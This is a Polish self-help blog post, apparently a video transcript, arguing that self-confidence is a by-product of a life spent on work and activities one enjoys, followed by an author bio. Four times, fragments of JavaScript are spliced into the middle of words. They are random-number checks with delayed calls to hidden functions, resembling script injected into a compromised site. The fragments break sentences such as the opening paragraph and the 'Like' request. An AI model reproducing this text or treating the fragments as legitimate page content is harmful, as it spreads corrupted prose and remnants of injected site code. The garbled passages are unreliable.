Jak być pewnym siebie. Skończ z mitami i zmień swoje życie!

Jak być pewnym siebie? Pewności siebie nie uzyskasz po zasdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowaniu prostej receptury “trzy kroki do…” albo po zażyciu uniwersalnej “pigułki pewności”. Nie da ci jej przeczytanie stu książek na temat pewności siebie ani udział w kursach pod tytułem “pewność siebie na zawołanie”. Skończ z mitami na ten temat!

Jeśli film Ci się spodobał, kliknij Lubię dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Możesz zostawić także swój komentarz na blogu albo na YT.

Jeśli nie lubisz mnie oglądać, przeczytaj transkrypt:

Pewność siebie dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to myśli i odczucia, które masz na swój temat. Bycie pewnym siebie dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to znaczy mieć pozytywne zdanie, pozytywne spojrzenie na siebie samego, lubienie siebie i szanowanie.

Pozostaje odpowiedzieć sobie na pytanie jak siebie polubić?

Musisz zdać sobie sprawę, że jesteś tym, co robisz. Jeśli chodzisz do roboty, której nienawidzisz, jeśli wykonujesz pracę, która doprowadza Cię do szału, jak masz lubić swoje życie a tym samym siebie???

Spędzaj zatem czas na robieniu rzeczy, które lubisz, które przynoszą Ci radość i satysfakcję. Buduj szacunek dla siebie wśród innych.

Jak?

Gdy “oni” będą wiedzieli, że jesteś zadowolony ze swojego życia, będę Cię podziwiać, będą chcieli być tacy jak Ty, będą chcieli spędzać z Tobą czas a tym samym wzrośnie Twoja pewność siebie.

To efekt synergii.

Będziesz się wzajemnie napędzać ze swoimi znajomymi. wysyłasz sygnał “jestem pewny siebie” i odbierasz potwierdzenie co prowadzi do jeszcze większej pewności siebie u … Ciebie 😉

Pamiętaj: pewność siebie nie jest celem samym w sobie. To produkt “uboczny” Twojego dobrego życia. Życia w zgodzie ze sobą samym i nie szkodząc innym.

Podejmij akcję: skończ z mitami “nauki” pewności siebie i zmień swoje życie już teraz!

powodzenia.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

4 komentarze

Leave a Reply